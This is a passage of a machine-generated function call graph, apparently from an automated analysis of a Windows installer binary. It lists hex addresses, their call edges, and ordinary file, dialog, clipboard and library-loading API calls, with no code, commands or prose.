4035b7 SetFilePointer 4690->4691 4697 406bf1 4690->4697 4691->4680 4693 4033c1 4692->4693 4693->4647 4693->4650 4695 406242 4694->4695 4695->4654 4696->4684 4698 406c16 4697->4698 4701 406c1e 4697->4701 4698->4690 4699 406ca5 GlobalFree 4700 406cae GlobalAlloc 4699->4700 4700->4698 4700->4701 4701->4698 4701->4699 4701->4700 4702 406d25 GlobalAlloc 4701->4702 4703 406d1c GlobalFree 4701->4703 4702->4698 4702->4701 4703->4702 4705 40403e 4704->4705 4721 4065c9 wsprintfW 4705->4721 4707 4040af 4722 4040e3 4707->4722 4709 403ddf 4709->4483 4710 4040b4 4710->4709 4711 4066bf 21 API calls 4710->4711 4711->4710 4712->4479 4713->4485 4725 40464d 4714->4725 4716 4057fd 4720 405824 4716->4720 4728 401389 4716->4728 4717 40464d SendMessageW 4718 405836 OleUninitialize 4717->4718 4718->4515 4720->4717 4721->4707 4723 4066bf 21 API calls 4722->4723 4724 4040f1 SetWindowTextW 4723->4724 4724->4710 4726 404665 4725->4726 4727 404656 SendMessageW 4725->4727 4726->4716 4727->4726 4729 401390 4728->4729 4730 4013fe 4729->4730 4731 4013cb MulDiv SendMessageW 4729->4731 4730->4716 4731->4729 4732->4530 4734 406019 4733->4734 4737 40602b 4733->4737 4736 406026 CharNextW 4734->4736 4734->4737 4735 40604f 4735->4533 4735->4534 4736->4735 4737->4735 4738 405f7e CharNextW 4737->4738 4738->4737 4739->4563 4740->4574 4749 40614d GetFileAttributesW 4741->4749 4744 405d73 4744->4574 4745 405d61 RemoveDirectoryW 4747 405d6f 4745->4747 4746 405d69 DeleteFileW 4746->4747 4747->4744 4748 405d7f SetFileAttributesW 4747->4748 4748->4744 4750 405d52 4749->4750 4751 40615f SetFileAttributesW 4749->4751 4750->4744 4750->4745 4750->4746 4751->4750 4753 4062f8 4752->4753 4754 40631e GetShortPathNameW 4752->4754 4779 406172 GetFileAttributesW CreateFileW 4753->4779 4755 406333 4754->4755 4756 40643d 4754->4756 4755->4756 4759 40633b wsprintfA 4755->4759 4756->4595 4758 406302 CloseHandle GetShortPathNameW 4758->4756 4760 406316 4758->4760 4761 4066bf 21 API calls 4759->4761 4760->4754 4760->4756 4762 406363 4761->4762 4780 406172 GetFileAttributesW CreateFileW 4762->4780 4764 406370 4764->4756 4765 40637f GetFileSize GlobalAlloc 4764->4765 4766 4063a1 4765->4766 4767 406436 CloseHandle 4765->4767 4768 4061f5 ReadFile 4766->4768 4767->4756 4769 4063a9 4768->4769 4769->4767 4781 4060d7 lstrlenA 4769->4781 4772 4063c0 lstrcpyA 4775 4063e2 4772->4775 4773 4063d4 4774 4060d7 4 API calls 4773->4774 4774->4775 4776 406419 SetFilePointer 4775->4776 4777 406224 WriteFile 4776->4777 4778 40642f GlobalFree 4777->4778 4778->4767 4779->4758 4780->4764 4782 406118 lstrlenA 4781->4782 4783 406120 4782->4783 4784 4060f1 lstrcmpiA 4782->4784 4783->4772 4783->4773 4784->4783 4785 40610f CharNextA 4784->4785 4785->4782 4787 403ccd 4786->4787 4788 403c96 4787->4788 4789 403cd2 FreeLibrary GlobalFree 4787->4789 4788->4611 4789->4788 4789->4789 4796 4015c6 4797 402dab 21 API calls 4796->4797 4798 4015cd 4797->4798 4799 405ffc 4 API calls 4798->4799 4804 4015d6 4799->4804 4800 401636 4802 401668 4800->4802 4803 40163b 4800->4803 4801 405f7e CharNextW 4801->4804 4807 401423 28 API calls 4802->4807 4815 401423 4803->4815 4804->4800 4804->4801 4809 405c30 2 API calls 4804->4809 4810 405c4d 5 API calls 4804->4810 4813 40161c GetFileAttributesW 4804->4813 4814 405bd6 2 API calls 4804->4814 4812 401660 4807->4812 4809->4804 4810->4804 4811 40164f SetCurrentDirectoryW 4811->4812 4813->4804 4814->4804 4816 405707 28 API calls 4815->4816 4817 401431 4816->4817 4818 406682 lstrcpynW 4817->4818 4818->4811 5287 405846 5288 4059f0 5287->5288 5289 405867 GetDlgItem GetDlgItem GetDlgItem 5287->5289 5291 405a21 5288->5291 5292 4059f9 GetDlgItem CreateThread CloseHandle 5288->5292 5332 404636 SendMessageW 5289->5332 5293 405a4c 5291->5293 5295 405a71 5291->5295 5296 405a38 ShowWindow ShowWindow 5291->5296 5292->5291 5297 405aac 5293->5297 5299 405a60 5293->5299 5300 405a86 ShowWindow 5293->5300 5294 4058d7 5302 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 5294->5302 5301 404668 8 API calls 5295->5301 5334 404636 SendMessageW 5296->5334 5297->5295 5305 405aba SendMessageW 5297->5305 5335 4045da 5299->5335 5307 405aa6 5300->5307 5308 405a98 5300->5308 5312 405a7f 5301->5312 5303 405930 SendMessageW SendMessageW 5302->5303 5304 40594c 5302->5304 5303->5304 5309 405951 SendMessageW 5304->5309 5310 40595f 5304->5310 5311 405ad3 CreatePopupMenu 5305->5311 5305->5312 5314 4045da SendMessageW 5307->5314 5313 405707 28 API calls 5308->5313 5309->5310 5316 404601 22 API calls 5310->5316 5315 4066bf 21 API calls 5311->5315 5313->5307 5314->5297 5317 405ae3 AppendMenuW 5315->5317 5318 40596f 5316->5318 5319 405b00 GetWindowRect 5317->5319 5320 405b13 TrackPopupMenu 5317->5320 5321 405978 ShowWindow 5318->5321 5322 4059ac GetDlgItem SendMessageW 5318->5322 5319->5320 5320->5312 5323 405b2e 5320->5323 5324 40599b 5321->5324 5325 40598e ShowWindow 5321->5325 5322->5312 5326 4059d3 SendMessageW SendMessageW 5322->5326 5327 405b4a SendMessageW 5323->5327 5333 404636 SendMessageW 5324->5333 5325->5324 5326->5312 5327->5327 5328 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5327->5328 5330 405b8c SendMessageW 5328->5330 5330->5330 5331 405bb5 GlobalUnlock SetClipboardData CloseClipboard 5330->5331 5331->5312 5332->5294 5333->5322 5334->5293 5336 4045e1 5335->5336 5337 4045e7 SendMessageW 5335->5337 5336->5337 5337->5295 4819 401c48 4820 402d89 21 API calls 4819->4820 4821 401c4f 4820->4821 4822 402d89 21 API calls 4821->4822 4823 401c5c 4822->4823 4824 402dab 21 API calls 4823->4824 4826 401c71 4823->4826 4824->4826 4825 401c81 4828 401cd8 4825->4828 4829 401c8c 4825->4829 4826->4825 4827 402dab 21 API calls 4826->4827 4827->4825 4830 402dab 21 API calls 4828->4830 4831 402d89 21 API calls 4829->4831 4832 401cdd 4830->4832 4833 401c91 4831->4833 4834 402dab 21 API calls 4832->4834 4835 402d89 21 API calls 4833->4835 4836 401ce6 FindWindowExW 4834->4836 4837 401c9d 4835->4837 4840 401d08 4836->4840 4838 401cc8 SendMessageW 4837->4838 4839 401caa SendMessageTimeoutW 4837->4839 4838->4840 4839->4840 5338 404e48 5339 404e74 5338->5339 5340 404e58 5338->5340 5341 404ea7 5339->5341 5342 404e7a SHGetPathFromIDListW 5339->5342 5349 405cc6 GetDlgItemTextW 5340->5349 5344 404e8a 5342->5344 5348 404e91 SendMessageW 5342->5348 5346 40140b 2 API calls 5344->5346 5345 404e65 SendMessageW 5345->5339 5346->5348 5348->5341 5349->5345 5350 4028c9 5351 4028cf 5350->5351 5352 4028d7 FindClose 5351->5352 5353 402c2f 5351->5353 5352->5353 5357 4016d1 5358 402dab 21 API calls 5357->5358 5359 4016d7 GetFullPathNameW 5358->5359 5360 4016f1 5359->5360 5361 401713 5359->5361 5360->5361 5364 4069df 2 API calls 5360->5364 5362 401728 GetShortPathNameW 5361->5362 5363 402c2f 5361->5363 5362->5363 5365 401703 5364->5365 5365->5361 5367 406682 lstrcpynW 5365->5367 5367->5361 5368 401e53 GetDC 5369 402d89 21 API calls 5368->5369 5370 401e65 GetDeviceCaps MulDiv ReleaseDC 5369->5370 5371 402d89 21 API calls 5370->5371 5372 401e96 5371->5372 5373 4066bf 21 API calls 5372->5373 5374 401ed3 CreateFontIndirectW 5373->5374 5375 40263d 5374->5375 5390 4014d7 5391 402d89 21 API calls 5390->5391 5392 4014dd Sleep 5391->5392 5394 402c2f 5392->5394 5395 7025103d 5398 7025101b 5395->5398 5405 702515b6 5398->5405 5400 70251020 5401 70251024 5400->5401 5402 70251027 GlobalAlloc 5400->5402 5403 702515dd 3 API calls 5401->5403 5402->5401 5404 7025103b 5403->5404 5407 702515bc 5405->5407 5406 702515c2 5406->5400 5407->5406 5408 702515ce GlobalFree 5407->5408 5408->5400 5409 40195b 5410 402dab 21 API calls 5409->5410 5411 401962 lstrlenW 5410->5411 5412 40263d 5411->5412 5017 4020dd 5018 4021a1 5017->5018 5019 4020ef 5017->5019 5021 401423 28 API calls 5018->5021 5020 402dab 21 API calls 5019->5020 5022 4020f6 5020->5022 5027 4022fb 5021->5027 5023 402dab 21 API calls 5022->5023 5024 4020ff 5023->5024 5025 402115 LoadLibraryExW 5024->5025 5026 402107 GetModuleHandleW 5024->5026 5025->5018 5028 402126 5025->5028 5026->5025 5026->5028 5040 406ae5 5028->5040 5031 402170 5033 405707 28 API calls 5031->5033 5032 402137 5034 402156 5032->5034 5035 40213f 5032->5035 5036 402147 5033->5036 5045 70251817 5034->5045 5037 401423 28 API calls 5035->5037 5036->5027 5038 402193 FreeLibrary 5036->5038 5037->5036 5038->5027 5087 4066a4 WideCharToMultiByte 5040->5087 5042 406b02 5043 406b09 GetProcAddress 5042->5043 5044 402131 5042->5044 5043->5044 5044->5031 5044->5032 5046 7025184a 5045->5046 5088 70251bff 5046->5088 5048 70251851 5049 70251976 5048->5049 5050 70251862 5048->5050 5051 70251869 5048->5051 5049->5036 5138 7025243e 5050->5138 5122 70252480 5051->5122 5056 702518cd 5062 702518d3 5056->5062 5063 7025191e 5056->5063 5057 702518af 5151 70252655 5057->5151 5058 7025187f 5061 70251885 5058->5061 5066 70251890 5058->5066 5059 70251898 5073 7025188e 5059->5073 5148 70252e23 5059->5148 5061->5073 5132 70252b98 5061->5132 5170 70251666 5062->5170 5064 70252655 10 API calls 5063->5064 5074 7025190f 5064->5074 5065 702518b5 5162 70251654 5065->5162 5142 70252810 5066->5142 5073->5056 5073->5057 5078 70251965 5074->5078 5176 70252618 5074->5176 5076 70251896 5076->5073 5077 70252655 10 API calls 5077->5074 5078->5049 5082 7025196f GlobalFree 5078->5082 5082->5049 5084 70251951 5084->5078 5180 702515dd wsprintfW 5084->5180 5085 7025194a FreeLibrary 5085->5084 5087->5042 5183 702512bb GlobalAlloc 5088->5183 5090 70251c26 5184 702512bb GlobalAlloc 5090->5184 5092 70251e6b GlobalFree GlobalFree GlobalFree 5093 70251e88 5092->5093 5104 70251ed2 5092->5104 5094 7025227e 5093->5094 5102 70251e9d 5093->5102 5093->5104 5096 702522a0 GetModuleHandleW 5094->5096 5094->5104 5095 70251d26 GlobalAlloc 5114 70251c31 5095->5114 5099 702522c6 5096->5099 5100 702522b1 LoadLibraryW 5096->5100 5097 70251d71 lstrcpyW 5101 70251d7b lstrcpyW 5097->5101 5098 70251d8f GlobalFree 5098->5114 5191 702516bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5099->5191 5100->5099 5100->5104 5101->5114 5102->5104 5187 702512cc 5102->5187 5104->5048 5105 70252318 5105->5104 5109 70252325 lstrlenW 5105->5109 5106 70252126 5190 702512bb GlobalAlloc 5106->5190 5192 702516bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5109->5192 5110 70252067 GlobalFree 5110->5114 5111 702521ae 5111->5104 5119 70252216 lstrcpyW 5111->5119 5112 702522d8 5112->5105 5120 70252302 GetProcAddress 5112->5120 5114->5092 5114->5095 5114->5097 5114->5098 5114->5101 5114->5104 5114->5106 5114->5110 5114->5111 5115 702512cc 2 API calls 5114->5115 5116 70251dcd 5114->5116 5115->5114 5116->5114 5185 7025162f GlobalSize GlobalAlloc 5116->5185 5117 7025233f 5117->5104 5119->5104 5120->5105 5121 7025212f 5121->5048 5129 70252498 5122->5129 5123 702512cc GlobalAlloc lstrcpynW 5123->5129 5125 702525c1 GlobalFree 5128 7025186f 5125->5128 5125->5129 5126 70252540 GlobalAlloc WideCharToMultiByte 5126->5125 5127 7025256b GlobalAlloc CLSIDFromString 5127->5125 5128->5058 5128->5059 5128->5073 5129->5123 5129->5125 5129->5126 5129->5127 5131 7025258a 5129->5131 5194 7025135a 5129->5194 5131->5125 5198 702527a4 5131->5198 5134 70252baa 5132->5134 5133 70252c4f SetFilePointer 5137 70252c6d 5133->5137 5134->5133 5136 70252d39 5136->5073 5201 70252b42 5137->5201 5139 70252453 5138->5139 5140 7025245e GlobalAlloc 5139->5140 5141 70251868 5139->5141 5140->5139 5141->5051 5146 70252840 5142->5146 5143 702528ee 5145 702528f4 GlobalSize 5143->5145 5147 702528fe 5143->5147 5144 702528db GlobalAlloc 5144->5147 5145->5147 5146->5143 5146->5144 5147->5076 5149 70252e2e 5148->5149 5150 70252e6e GlobalFree 5149->5150 5205 702512bb GlobalAlloc 5151->5205 5153 702526d8 MultiByteToWideChar 5160 7025265f 5153->5160 5154 7025270b lstrcpynW 5154->5160 5155 702526fa StringFromGUID2 5155->5160 5156 7025271e wsprintfW 5156->5160 5157 70252742 GlobalFree 5157->5160 5158 70252777 GlobalFree 5158->5065 5159 70251312 2 API calls 5159->5160 5160->5153 5160->5154 5160->5155 5160->5156 5160->5157 5160->5158 5160->5159 5206 70251381 5160->5206 5210 702512bb GlobalAlloc 5162->5210 5164 70251659 5165 70251666 2 API calls 5164->5165 5166 70251663 5165->5166 5167 70251312 5166->5167 5168 70251355 GlobalFree 5167->5168 5169 7025131b GlobalAlloc lstrcpynW 5167->5169 5168->5074 5169->5168 5171 70251672 wsprintfW 5170->5171 5174 7025169f lstrcpyW 5170->5174 5175 702516b8 5171->5175 5174->5175 5175->5077 5177 70252626 5176->5177 5179 70251931 5176->5179 5178 70252642 GlobalFree 5177->5178 5177->5179 5178->5177 5179->5084 5179->5085 5181 70251312 2 API calls 5180->5181 5182 702515fe 5181->5182 5182->5078 5183->5090 5184->5114 5186 7025164d 5185->5186 5186->5116 5193 702512bb GlobalAlloc 5187->5193 5189 702512db lstrcpynW 5189->5104 5190->5121 5191->5112 5192->5117 5193->5189 5195 70251361 5194->5195 5196 702512cc 2 API calls 5195->5196 5197 7025137f 5196->5197 5197->5129 5199 702527b2 VirtualAlloc 5198->5199 5200 70252808 5198->5200 5199->5200 5200->5131 5202 70252b4d 5201->5202 5203 70252b52 GetLastError 5202->5203 5204 70252b5d 5202->5204 5203->5204 5204->5136 5205->5160 5207 702513ac 5206->5207 5208 7025138a 5206->5208 5207->5160 5208->5207 5209 70251390 lstrcpyW 5208->5209 5209->5207 5210->5164 5420 402b5e 5421 402bb0 5420->5421 5423 402b65 5420->5423 5422 406a76 5 API calls 5421->5422 5426 402bb7 5422->5426 5424 402bae 5423->5424 5425 402d89 21 API calls 5423->5425 5427 402b73 5425->5427 5428 402dab 21 API calls 5426->5428 5429 402d89 21 API calls 5427->5429 5430 402bc0 5428->5430 5433 402b7f 5429->5433 5430->5424 5431 402bc4 IIDFromString 5430->5431 5431->5424 5432 402bd3 5431->5432 5432->5424 5438 406682 lstrcpynW 5432->5438 5437 4065c9 wsprintfW 5433->5437 5436 402bf0 CoTaskMemFree 5436->5424 5437->5424 5438->5436 5439 402a60 5440 402d89 21 API calls 5439->5440 5441 402a66 5440->5441 5442 402aa9 5441->5442 5443 402a8d 5441->5443 5451 402933 5441->5451 5446 402ac3 5442->5446 5447 402ab3 5442->5447 5444 402a92 5443->5444 5445 402aa3 5443->5445 5453 406682 lstrcpynW 5444->5453 5454 4065c9 wsprintfW 5445->5454 5449 4066bf 21 API calls 5446->5449 5448 402d89 21 API calls 5447->5448 5448->5451 5449->5451 5453->5451 5454->5451 4304 401761 4310 402dab 4304->4310 4308 40176f 4309 4061a1 2 API calls 4308->4309 4309->4308 4311 402db7 4310->4311 4312 4066bf 21 API calls 4311->4312 4313 402dd8 4312->4313 4314 401768 4313->4314 4315 406930 5 API calls 4313->4315 4316 4061a1 4314->4316 4315->4314 4317 4061ae GetTickCount GetTempFileNameW 4316->4317 4318 4061e8 4317->4318 4319 4061e4 4317->4319 4318->4308 4319->4317 4319->4318 5455 401d62 5456 402d89 21 API calls 5455->5456 5457 401d73 SetWindowLongW 5456->5457 5458 402c2f 5457->5458 5459 4028e3 5460 4028eb 5459->5460 5461 4028ef FindNextFileW 5460->5461 5463 402901 5460->5463 5462 402948 5461->5462 5461->5463 5465 406682 lstrcpynW 5462->5465 5465->5463 5466 70251000 5467 7025101b 5 API calls 5466->5467 5468 70251019 5467->5468 5469 7025170d 5470 702515b6 GlobalFree 5469->5470 5472 70251725 5470->5472 5471 7025176b GlobalFree 5472->5471 5473 70251740 5472->5473 5474 70251757 VirtualFree 5472->5474 5473->5471 5474->5471 5475 401568 5476 402ba9 5475->5476 5479 4065c9 wsprintfW 5476->5479 5478 402bae 5479->5478 5487 40196d 5488 402d89 21 API calls 5487->5488 5489 401974 5488->5489 5490 402d89 21 API calls 5489->5490 5491 401981 5490->5491 5492 402dab 21 API calls 5491->5492 5493 401998 lstrlenW 5492->5493 5495 4019a9 5493->5495 5494 4019ea 5495->5494 5499 406682 lstrcpynW 5495->5499 5497 4019da 5497->5494 5498 4019df lstrlenW 5497->5498 5498->5494 5499->5497 5500 40506e GetDlgItem GetDlgItem 5501 4050c0 7 API calls 5500->5501 5512 4052e5 5500->5512 5502 405167 DeleteObject 5501->5502 5503 40515a SendMessageW 5501->5503 5504 405170 5502->5504 5503->5502 5505 4051a7 5504->5505 5506 4066bf 21 API calls 5504->5506 5507 404601 22 API calls 5505->5507 5513 405189 SendMessageW SendMessageW 5506->5513 5514 4051bb 5507->5514 5508 405473 5510 405485 5508->5510 5511 40547d SendMessageW 5508->5511 5509 4053c7 5509->5508 5515 405420 SendMessageW 5509->5515 5543 4052d8 5509->5543 5522 405497 ImageList_Destroy 5510->5522 5523 40549e 5510->5523 5531 4054ae 5510->5531 5511->5510 5512->5509 5530 405354 5512->5530 5554 404fbc SendMessageW 5512->5554 5513->5504 5519 404601 22 API calls 5514->5519 5520 405435 SendMessageW 5515->5520 5515->5543 5516 4053b9 SendMessageW 5516->5509 5517 404668 8 API calls 5521 405674 5517->5521 5535 4051cc 5519->5535 5525 405448 5520->5525 5522->5523 5527 4054a7 GlobalFree 5523->5527 5523->5531 5524 4052a7 GetWindowLongW SetWindowLongW 5529 4052c0 5524->5529 5537 405459 SendMessageW 5525->5537 5526 405628 5528 40563a ShowWindow GetDlgItem ShowWindow 5526->5528 5526->5543 5527->5531 5528->5543 5532 4052c5 ShowWindow 5529->5532 5533 4052dd 5529->5533 5530->5509 5530->5516 5531->5526 5547 4054e9 5531->5547 5559 40503c 5531->5559 5552 404636 SendMessageW 5532->5552 5553 404636 SendMessageW 5533->5553 5535->5524 5536 40521f SendMessageW 5535->5536 5538 4052a2 5535->5538 5540 405271 SendMessageW 5535->5540 5541 40525d SendMessageW 5535->5541 5536->5535 5537->5508 5538->5524 5538->5529 5540->5535 5541->5535 5543->5517 5544 4055f3 5545 4055fe InvalidateRect 5544->5545 5548 40560a 5544->5548 5545->5548 5546 405517 SendMessageW 5551 40552d 5546->5551 5547->5546 5547->5551 5548->5526 5568 404f77 5548->5568 5550 4055a1 SendMessageW SendMessageW 5550->5551 5551->5544 5551->5550 5552->5543 5553->5512 5555 40501b SendMessageW 5554->5555 5556 404fdf GetMessagePos ScreenToClient SendMessageW 5554->5556 5557 405013 5555->5557 5556->5557 5558 405018 5556->5558 5557->5530 5558->5555 5571 406682 lstrcpynW 5559->5571 5561 40504f 5572 4065c9 wsprintfW 5561->5572 5563 405059 5564 40140b 2 API calls 5563->5564 5565 405062 5564->5565 5573 406682 lstrcpynW 5565->5573 5567 405069 5567->5547 5574 404eae 5568->5574 5570 404f8c 5570->5526 5571->5561 5572->5563 5573->5567 5575 404ec7 5574->5575 5576 4066bf 21 API calls 5575->5576 5577 404f2b 5576->5577 5578 4066bf 21 API calls 5577->5578 5579 404f36 5578->5579 5580 4066bf 21 API calls 5579->5580 5581 404f4c lstrlenW wsprintfW SetDlgItemTextW 5580->5581 5581->5570 5582 40166f 5583 402dab 21 API calls 5582->5583 5584 401675 5583->5584 5585 4069df 2 API calls 5584->5585 5586 40167b 5585->5586 5587 402af0 5588 402d89 21 API calls 5587->5588 5590 402af6 5588->5590 5589 402933 5590->5589 5591 4066bf 21 API calls 5590->5591 5591->5589 4891 4026f1 4892 402d89 21 API calls 4891->4892 4900 402700 4892->4900 4893 40283d 4894 40274a ReadFile 4894->4893 4894->4900 4895 4027e3 4895->4893 4895->4900 4905 406253 SetFilePointer 4895->4905 4896 4061f5 ReadFile 4896->4900 4897 40278a MultiByteToWideChar 4897->4900 4898 40283f 4914 4065c9 wsprintfW 4898->4914 4900->4893 4900->4894 4900->4895 4900->4896 4900->4897 4900->4898 4902 4027b0 SetFilePointer MultiByteToWideChar 4900->4902 4903 402850 4900->4903 4902->4900 4903->4893 4904 402871 SetFilePointer 4903->4904 4904->4893 4906 40626f 4905->4906 4907 406287 4905->4907 4908 4061f5 ReadFile 4906->4908 4907->4895 4909 40627b 4908->4909 4909->4907 4910 406290 SetFilePointer 4909->4910 4911 4062b8 SetFilePointer 4909->4911 4910->4911 4912 40629b 4910->4912 4911->4907 4913 406224 WriteFile 4912->4913 4913->4907 4914->4893 5592 404771 lstrlenW 5593 404790 5592->5593 5594 404792 WideCharToMultiByte 5592->5594 5593->5594 5595 404af2 5596 404b1e 5595->5596 5597 404b2f 5595->5597 5656 405cc6 GetDlgItemTextW 5596->5656 5599 404b3b GetDlgItem 5597->5599 5605 404b9a 5597->5605 5601 404b4f 5599->5601 5600 404b29 5603 406930 5 API calls 5600->5603 5604 404b63 SetWindowTextW 5601->5604 5608 405ffc 4 API calls 5601->5608 5602 404c7e 5654 404e2d 5602->5654 5658 405cc6 GetDlgItemTextW 5602->5658 5603->5597 5609 404601 22 API calls 5604->5609 5605->5602 5610 4066bf 21 API calls 5605->5610 5605->5654 5607 404668 8 API calls 5612 404e41 5607->5612 5613 404b59 5608->5613 5614 404b7f 5609->5614 5615 404c0e SHBrowseForFolderW 5610->5615 5611 404cae 5616 406059 18 API calls 5611->5616 5613->5604 5622 405f51 3 API calls 5613->5622 5617 404601 22 API calls 5614->5617 5615->5602 5618 404c26 CoTaskMemFree 5615->5618 5619 404cb4 5616->5619 5620 404b8d 5617->5620 5621 405f51 3 API calls 5618->5621 5659 406682 lstrcpynW 5619->5659 5657 404636 SendMessageW 5620->5657 5624 404c33 5621->5624 5622->5604 5627 404c6a SetDlgItemTextW 5624->5627 5631 4066bf 21 API calls 5624->5631 5626 404b93 5629 406a76 5 API calls 5626->5629 5627->5602 5628 404ccb 5630 406a76 5 API calls 5628->5630 5629->5605 5642 404cd2 5630->5642 5632 404c52 lstrcmpiW 5631->5632 5632->5627 5635 404c63 lstrcatW 5632->5635 5633 404d13 5660 406682 lstrcpynW 5633->5660 5635->5627 5636 404d1a 5637 405ffc 4 API calls 5636->5637 5638 404d20 GetDiskFreeSpaceW 5637->5638 5640 404d44 MulDiv 5638->5640 5644 404d6b 5638->5644 5640->5644 5641 405f9d 2 API calls 5641->5642 5642->5633 5642->5641 5642->5644 5643 404ddc 5646 404dff 5643->5646 5648 40140b 2 API calls 5643->5648 5644->5643 5645 404f77 24 API calls 5644->5645 5647 404dc9 5645->5647 5661 404623 EnableWindow 5646->5661 5650 404dde SetDlgItemTextW 5647->5650 5651 404dce 5647->5651 5648->5646 5650->5643 5653 404eae 24 API calls 5651->5653 5652 404e1b 5652->5654 5655 404a4b SendMessageW 5652->5655 5653->5643 5654->5607 5655->5654 5656->5600 5657->5626 5658->5611 5659->5628 5660->5636 5661->5652 4915 401774 4916 402dab 21 API calls 4915->4916 4917 40177b 4916->4917 4918 4017a3 4917->4918 4919 40179b 4917->4919 4956 406682 lstrcpynW 4918->4956 4955 406682 lstrcpynW 4919->4955 4922 4017a1 4926 406930 5 API calls 4922->4926 4923 4017ae 4924 405f51 3 API calls 4923->4924 4925 4017b4 lstrcatW 4924->4925 4925->4922 4929 4017c0 4926->4929 4927 4069df 2 API calls 4927->4929 4928 4017fc 4930 40614d 2 API calls 4928->4930 4929->4927 4929->4928 4932 4017d2 CompareFileTime 4929->4932 4933 401892 4929->4933 4934 401869 4929->4934 4936 406682 lstrcpynW 4929->4936 4942 4066bf 21 API calls 4929->4942 4951 405ce2 MessageBoxIndirectW 4929->4951 4954 406172 GetFileAttributesW CreateFileW 4929->4954 4930->4929 4932->4929 4935 405707 28 API calls 4933->4935 4938 405707 28 API calls 4934->4938 4944 40187e 4934->4944 4937 40189c 4935->4937 4936->4929 4939 403376 48 API calls 4937->4939 4938->4944 4940 4018af 4939->4940 4941 4018c3 SetFileTime 4940->4941 4943 4018d5 CloseHandle 4940->4943 4941->4943 4942->4929 4943->4944 4945 4018e6 4943->4945 4946 4018eb 4945->4946 4947 4018fe 4945->4947 4949 4066bf 21 API calls 4946->4949 4948 4066bf 21 API calls 4947->4948 4950 401906 4948->4950 4952 4018f3 lstrcatW 4949->4952 4950->4944 4953 405ce2 MessageBoxIndirectW 4950->4953 4951->4929 4952->4950 4953->4944 4954->4929 4955->4922 4956->4923 5662 4014f5 SetForegroundWindow 5663 402c2f 5662->5663 5664 401a77 5665 402d89 21 API calls 5664->5665 5666 401a80 5665->5666 5667 402d89 21 API calls 5666->5667 5668 401a25 5667->5668 5669 401578 5670 401591 5669->5670 5671 401588 ShowWindow 5669->5671 5672 402c2f 5670->5672 5673 40159f ShowWindow 5670->5673 5671->5670 5673->5672 5007 4023f9 5008 402dab 21 API calls 5007->5008 5009 402408 5008->5009 5010 402dab 21 API calls 5009->5010 5011 402411 5010->5011 5012 402dab 21 API calls 5011->5012 5013 40241b GetPrivateProfileStringW 5012->5013 5674 40567b 5675 40568b 5674->5675 5676 40569f 5674->5676 5677 405691 5675->5677 5678 4056e8 5675->5678 5679 4056a7 IsWindowVisible 5676->5679 5685 4056be 5676->5685 5681 40464d SendMessageW 5677->5681 5680 4056ed CallWindowProcW 5678->5680 5679->5678 5682 4056b4 5679->5682 5683 40569b 5680->5683 5681->5683 5684 404fbc 5 API calls 5682->5684 5684->5685 5685->5680 5686 40503c 4 API calls 5685->5686 5686->5678 5687 401ffb 5688 402dab 21 API calls 5687->5688 5689 402002 5688->5689 5690 4069df 2 API calls 5689->5690 5691 402008 5690->5691 5692 402019 5691->5692 5694 4065c9 wsprintfW 5691->5694 5694->5692 5695 401b7c 5696 402dab 21 API calls 5695->5696 5697 401b83 5696->5697 5698 402d89 21 API calls 5697->5698 5699 401b8c wsprintfW 5698->5699 5700 402c2f 5699->5700 5701 401000 5702 401037 BeginPaint GetClientRect 5701->5702 5703 40100c DefWindowProcW 5701->5703 5705 4010f3 5702->5705 5708 401179 5703->5708 5706 401073 CreateBrushIndirect FillRect DeleteObject 5705->5706 5707 4010fc 5705->5707 5706->5705 5709 401102 CreateFontIndirectW 5707->5709 5710 401167 EndPaint 5707->5710 5709->5710 5711 401112 6 API calls 5709->5711 5710->5708 5711->5710 5712 401680 5713 402dab 21 API calls 5712->5713 5714 401687 5713->5714 5715 402dab 21 API calls 5714->5715 5716 401690 5715->5716 5717 402dab 21 API calls 5716->5717 5718 401699 MoveFileW 5717->5718 5719 4016ac 5718->5719 5725 4016a5 5718->5725 5721 4069df 2 API calls 5719->5721 5723 4022fb 5719->5723 5720 401423 28 API calls 5720->5723 5722 4016bb 5721->5722 5722->5723 5724 406442 40 API calls 5722->5724 5724->5725 5725->5720 5726 404102 5727 40411a 5726->5727 5728 40427b 5726->5728 5727->5728 5731 404126 5727->5731 5729 4042cc 5728->5729 5730 40428c GetDlgItem GetDlgItem 5728->5730 5733 404326 5729->5733 5745 401389 2 API calls 5729->5745 5732 404601 22 API calls 5730->5732 5734 404131 SetWindowPos 5731->5734 5735 404144 5731->5735 5738 4042b6 SetClassLongW 5732->5738 5739 40464d SendMessageW 5733->5739 5746 404276 5733->5746 5734->5735 5736 40414d ShowWindow 5735->5736 5737 40418f 5735->5737 5740 404239 5736->5740 5741 40416d GetWindowLongW 5736->5741 5742 404197 DestroyWindow 5737->5742 5743 4041ae 5737->5743 5744 40140b 2 API calls 5738->5744 5767 404338 5739->5767 5752 404668 8 API calls 5740->5752 5741->5740 5747 404186 ShowWindow 5741->5747 5748 40458a 5742->5748 5749 4041b3 SetWindowLongW 5743->5749 5750 4041c4 5743->5750 5744->5729 5751 4042fe 5745->5751 5747->5737 5748->5746 5757 4045bb ShowWindow 5748->5757 5749->5746 5750->5740 5755 4041d0 GetDlgItem 5750->5755 5751->5733 5756 404302 SendMessageW 5751->5756 5752->5746 5753 40140b 2 API calls 5753->5767 5754 40458c DestroyWindow EndDialog 5754->5748 5758 4041e1 SendMessageW IsWindowEnabled 5755->5758 5759 4041fe 5755->5759 5756->5746 5757->5746 5758->5746 5758->5759 5761 40420b 5759->5761 5762 404252 SendMessageW 5759->5762 5763 40421e 5759->5763 5771 404203 5759->5771 5760 4066bf 21 API calls 5760->5767 5761->5762 5761->5771 5762->5740 5765 404226 5763->5765 5766 40423b 5763->5766 5764 4045da SendMessageW 5764->5740 5768 40140b 2 API calls 5765->5768 5769 40140b 2 API calls 5766->5769 5767->5746 5767->5753 5767->5754 5767->5760 5770 404601 22 API calls 5767->5770 5772 404601 22 API calls 5767->5772 5788 4044cc DestroyWindow 5767->5788 5768->5771 5769->5771 5770->5767 5771->5740 5771->5764 5773 4043b3 GetDlgItem 5772->5773 5774 4043d0 ShowWindow EnableWindow 5773->5774 5775 4043c8 5773->5775 5797 404623 EnableWindow 5774->5797 5775->5774 5777 4043fa EnableWindow 5782 40440e 5777->5782 5778 404413 GetSystemMenu 